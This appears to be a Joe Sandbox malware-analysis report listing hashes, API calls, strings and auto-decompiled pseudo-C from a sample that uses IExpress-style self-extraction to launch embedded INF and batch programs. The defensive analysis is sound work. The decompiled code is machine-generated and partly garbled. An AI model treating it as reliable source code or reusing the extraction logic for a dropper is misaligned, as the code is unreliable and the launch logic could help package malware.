Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34985b88df329ca6fdd3e5418262bf0c405a34a8f4822d8a9cfadee7f9492f35
Instruction ID: 46c7879bc6b6374964eb852b1f8be906bfa29f432484e050b6393a2b1f17867c
Opcode Fuzzy Hash: 34985b88df329ca6fdd3e5418262bf0c405a34a8f4822d8a9cfadee7f9492f35
Instruction Fuzzy Hash: 2CE07D2AD3470549C722DEB8C7D40C9BB74B515374BAC4F65C04337A4CE7283345CA14

Uniqueness

Uniqueness Score: -1.00%

Function 00402188 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf1a879893bd4f68123757ba464a5dd5989b6e775eef527132f4ca5a6d0721d
Instruction ID: 8c9397d701aa1aaa9a6ec016f9392e2cc14686059782f13e64554f60d60fea19
Opcode Fuzzy Hash: 0bf1a879893bd4f68123757ba464a5dd5989b6e775eef527132f4ca5a6d0721d
Instruction Fuzzy Hash: 65C022B650810089CB219D34C3D58F23EB1EB80620740072A87622B2A8B9302B2190E6

Uniqueness

Uniqueness Score: -1.00%

Function 00402164 Relevance: .0, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402164() {

				L0:
				while(1) {
					L0:
					_push("true");
					asm("adc ebp, ebx");
					L1:
				}
			}

0x00402164
0x00402164
0x00402164
0x00402164
0x00402166
0x00402167
0x00402167

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90c154646b8f936bdfc8de90d495cf795a37d33cd45136dfb3bee77f1a2400f8
Instruction ID: 51f04be49cb71757b2c48f824bf9bb4518cc767c05676db5f76c9320bc92033b
Opcode Fuzzy Hash: 90c154646b8f936bdfc8de90d495cf795a37d33cd45136dfb3bee77f1a2400f8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 6F2B.exePID: 5796, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.3%
Total number of Nodes:	967
Total number of Limit Nodes:	40

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00933BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00933BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x938004; // 0x911e09f9
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x939124 =  *0x939124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x938a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x938c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0093468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E009344B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x939124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00931AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00936CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00933FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x938580;
													if( *0x938580 != 0) {
														E00932267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x938180;
											if( *0x938180 == 0) {
												_t146 = 0x4c7;
												E009344B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x939124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x939a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00936495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E009344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x939124 = E00936285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E009344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x938a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x939a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x938a38 & 0x0000ffff;
											_v380 = 0x939154;
											_v376 = _t151;
											_v372 = 0x9391e4;
											_v360 = _t97;
											if( *0x938a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x939a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x938d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x939a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x93a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x939124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x939a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x938a20;
										if( *0x938a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0093202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0093468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x938c42;
									if( *0x938c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x938a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0093468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0093468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00931781( &_v276, 0x104, _t130, 0x938c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0093468F(_t130, 0x939a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00933baa
0x00933bb0
0x00933bb7
0x00933bc0
0x00933bc2
0x00933bc9
0x00933bcb
0x00933bcf
0x00933bd3
0x00933bd9
0x00933bfd
0x00933bfd
0x00933bff
0x00933c03
0x00933c03
0x00933c11
0x00933c16
0x00933c19
0x00933c28
0x00000000
0x00000000
0x00933c30
0x00933c39
0x00933c40
0x00933d13
0x00933d15
0x00933d21
0x00933d26
0x00000000
0x00933c4f
0x00933c56
0x00933c60
0x00933c65
0x00933c77
0x00933c78
0x00933c7c
0x00933c7e
0x00933c82
0x00933c82
0x00000000
0x00933c7c
0x00933c67
0x00933c69
0x00933c6d
0x00000000
0x00933c58
0x00933c58
0x00933c6e
0x00933c6e
0x00933c87
0x00933c89
0x00933d4d
0x00933d4f
0x00933d50
0x00933d52
0x00933d9e
0x00933da8
0x00933daf
0x00933db4
0x00933db6
0x00933f4d
0x00933f4d
0x00933f4f
0x00933f56
0x00933f57
0x00933f58
0x00933f63
0x00933f63
0x00933dbc
0x00933dc0
0x00933dc2
0x00933de6
0x00933de6
0x00933de8
0x00933f0b
0x00933f0b
0x00933f0f
0x00933f13
0x00933f15
0x00933f1a
0x00933f1c
0x00933f46
0x00933f47
0x00000000
0x00933f47
0x00933f1e
0x00933f1f
0x00933f25
0x00933f26
0x00933f2a
0x00933f2d
0x00933fd9
0x00933fd9
0x00933fda
0x00933fda
0x00933fe1
0x00933fe3
0x00933fe3
0x00933fe8
0x00000000
0x00933fe8
0x00933f33
0x00933f37
0x00000000
0x00933f37
0x00933dee
0x00933dee
0x00933df5
0x00933fad
0x00933fb9
0x00933fc2
0x00933fc8
0x00000000
0x00933fc8
0x00933dfb
0x00933dfd
0x00000000
0x00000000
0x00933e03
0x00933e0a
0x00000000
0x00000000
0x00933e15
0x00933e17
0x00933e19
0x00933f94
0x00933fa4
0x00933f7c
0x00933f80
0x00933f8b
0x00000000
0x00933f8b
0x00933e2c
0x00933e30
0x00933e34
0x00933e36
0x00933f69
0x00933f6e
0x00933f70
0x00933f76
0x00000000
0x00933f76
0x00933e3c
0x00933e43
0x00933e47
0x00933e52
0x00933e56
0x00933e5c
0x00933e61
0x00933e68
0x00933e70
0x00933e74
0x00933e7c
0x00933e80
0x00933e82
0x00933e82
0x00933e87
0x00933e87
0x00933e8b
0x00933e91
0x00933e94
0x00933e96
0x00933e96
0x00933e9b
0x00933e9b
0x00933e9f
0x00933ea2
0x00933ea4
0x00933ea4
0x00933ea9
0x00933ea9
0x00933ead
0x00933eb3
0x00933eb6
0x00933eb8
0x00933eb8
0x00933ebd
0x00933ebd
0x00933ec1
0x00933ec3
0x00933ec5
0x00933ec5
0x00933eca
0x00933eca
0x00933ece
0x00933ed5
0x00933ed9
0x00933ee0
0x00933ee6
0x00933eea
0x00933eec
0x00933eee
0x00933ef3
0x00933ef3
0x00933ef5
0x00933efa
0x00933efb
0x00933efd
0x00933f40
0x00000000
0x00933eff
0x00933eff
0x00933f05
0x00000000
0x00933f05
0x00933efd
0x00933dc7
0x00933dce
0x00000000
0x00000000
0x00933dd0
0x00933dd7
0x00000000
0x00000000
0x00933dd9
0x00933ddb
0x00000000
0x00000000
0x00933ddd
0x00933de1
0x00000000
0x00933de1
0x00933d59
0x00933d65
0x00933d6a
0x00933d6c
0x00000000
0x00000000
0x00933d6e
0x00933d75
0x00000000
0x00000000
0x00933d8f
0x00933d96
0x00933d98
0x00000000
0x00000000
0x00000000
0x00933d98
0x00933c8f
0x00933c98
0x00933cf1
0x00933cf3
0x00000000
0x00000000
0x00933cfe
0x00933d11
0x00000000
0x00000000
0x00000000
0x00933d11
0x00933c9c
0x00933ca5
0x00933ca7
0x00000000
0x00000000
0x00933cad
0x00933cb2
0x00933cb7
0x00933cc5
0x00000000
0x00000000
0x00933ce8
0x00933cec
0x00933ced
0x00933ced
0x00000000
0x00933ce8
0x00933c9e
0x00000000
0x00933c9e
0x00933c56
0x00933d35
0x00933d35
0x00933d3c
0x00933d48
0x00000000
0x00933d48
0x00933c03
0x00933be2
0x00933be7
0x00933bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00933C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00933CDC

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00938C42), ref: 00933D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00933E26
FreeLibrary.KERNEL32(00000000,?,00938C42), ref: 00933EFF
LocalFree.KERNEL32(?,?,?,?,00938C42), ref: 00933F1F
FreeLibrary.KERNEL32(00000000,?,00938C42), ref: 00933F40
LocalFree.KERNEL32(?,?,?,?,00938C42), ref: 00933F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00938C42), ref: 00933F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00938C42), ref: 00933F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00938C42), ref: 00933FC2

Strings

ADMQCMD, xrefs: 00933C9E
D, xrefs: 00933C19
DoInfInstall, xrefs: 00933E1F, 00933E24, 00933F68
SHOWWINDOW, xrefs: 00933C34
USRQCMD, xrefs: 00933CAD
RUNPROGRAM, xrefs: 00933D05
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00933E74
POSTRUNPROGRAM, xrefs: 00933D60
foto5566, xrefs: 00933E68
advpack.dll, xrefs: 00933F9D
<None>, xrefs: 00933CC9, 00933D7D
REBOOT, xrefs: 00933BE2

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$foto5566
API String ID: 1032054927-4185182644
Opcode ID: aed09f4d8b7a5de4ea7c6656454ce84103ec3cda8f54b73d52cc7d443d7bde8e
Instruction ID: c38cb61bf17fb7567813b4a232b7d9848fe4de74099c6652c4d36f204c4574fb
Opcode Fuzzy Hash: aed09f4d8b7a5de4ea7c6656454ce84103ec3cda8f54b73d52cc7d443d7bde8e
Instruction Fuzzy Hash: 34B1F070A983019BE734DF248845B6B76E8EB85704F108A2DFAE5D61E0DB74CE44DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00931AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00931AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x938004; // 0x911e09f9
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00931680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00931A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00931781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					E0093658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00931680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E009366C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E009366C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00931680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00931781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E009316B3( &_v1552, 0x400, " ");
										E009316B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00932AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0093171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00931A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00931A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E009344B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x939120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x931140, _t156, 8,  &_v268) == 0) {
										 *0x939a34 =  *0x939a34 & 0xfffffffb;
										if( *0x939a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0093171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x939a34 =  *0x939a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00931680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00931680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00936CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00931af3
0x00931afa
0x00931b07
0x00931b09
0x00931b1a
0x00931b20
0x00931b2c
0x00931b3b
0x00931b40
0x00931b2e
0x00931b2e
0x00931b33
0x00931b33
0x00931b46
0x00931b4c
0x00931b52
0x00931b57
0x00931b5d
0x00931b61
0x00931b9f
0x00931b9f
0x00931bb1
0x00931bc2
0x00000000
0x00931b63
0x00931b63
0x00931b65
0x00931b68
0x00931b68
0x00931b6a
0x00931b6b
0x00931b6f
0x00931b74
0x00000000
0x00000000
0x00931b76
0x00931b7b
0x00931b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00931b8c
0x00931b8c
0x00931b98
0x00931bc7
0x00931bc9
0x00931bcc
0x00931bd3
0x00931d75
0x00931d76
0x00931d78
0x00931d7f
0x00931e05
0x00931e09
0x00000000
0x00000000
0x00931e12
0x00931e1b
0x00931e73
0x00931e21
0x00931e21
0x00931e28
0x00931e37
0x00931e3e
0x00931e52
0x00931e60
0x00931e60
0x00931e3e
0x00931e79
0x00931e7b
0x00931e84
0x00000000
0x00931d9b
0x00931d9b
0x00931da0
0x00931da2
0x00931da5
0x00931da5
0x00931da7
0x00931da8
0x00931dac
0x00931dae
0x00931db4
0x00931db7
0x00931db7
0x00931db9
0x00931dba
0x00931dbe
0x00931dc3
0x00931dce
0x00931dd2
0x00931deb
0x00000000
0x00931df0
0x00000000
0x00931dd2
0x00931bf7
0x00931bfe
0x00931c07
0x00931d55
0x00931d5a
0x00931d5b
0x00931d5d
0x00931d5e
0x00000000
0x00931c1b
0x00931c1b
0x00931c20
0x00931c2c
0x00931c33
0x00931c38
0x00931c3a
0x00931c3a
0x00931c40
0x00931c4b
0x00931c4b
0x00931c5d
0x00931c61
0x00931dd4
0x00931dd4
0x00931dd6
0x00931ddb
0x00931ddc
0x00931dde
0x00931d64
0x00931d64
0x00931d67
0x00931d6c
0x00000000
0x00931c67
0x00931c67
0x00931c6d
0x00931c72
0x00931c74
0x00931c74
0x00931c8e
0x00931c99
0x00931cc0
0x00931cf8
0x00931d07
0x00931d23
0x00931d09
0x00931d14
0x00931d1b
0x00931d1b
0x00931d2b
0x00931d2d
0x00931d2d
0x00931d38
0x00931d39
0x00931d46
0x00931cc2
0x00931cc2
0x00931ccc
0x00931cce
0x00931cce
0x00931cdb
0x00931ce6
0x00931cee
0x00931cee
0x00931e89
0x00931e91
0x00931e92
0x00931e94
0x00931e97
0x00931ea4
0x00931ea4
0x00931c61
0x00931c07
0x00931bd3
0x00931b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00931BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00931BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00931C57
GetPrivateProfileIntA.KERNEL32 ref: 00931C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00931140,00000000,00000008,?), ref: 00931CB8
GetShortPathNameA.KERNEL32 ref: 00931D1B

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Strings

setupapi.dll, xrefs: 00931D23, 00931D3A
AdvancedINF, xrefs: 00931CAE
.BAT, xrefs: 00931D83
Command.com /c %s, xrefs: 00931D9B, 00931DE8
setupx.dll, xrefs: 00931D14
Version, xrefs: 00931CB3
Reboot, xrefs: 00931C82
DefaultInstall, xrefs: 00931C74, 00931C87, 00931CCE, 00931CD3, 00931D2D, 00931D39
.INF, xrefs: 00931BDB
", xrefs: 00931B25
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00931BA0
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00931D3B

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
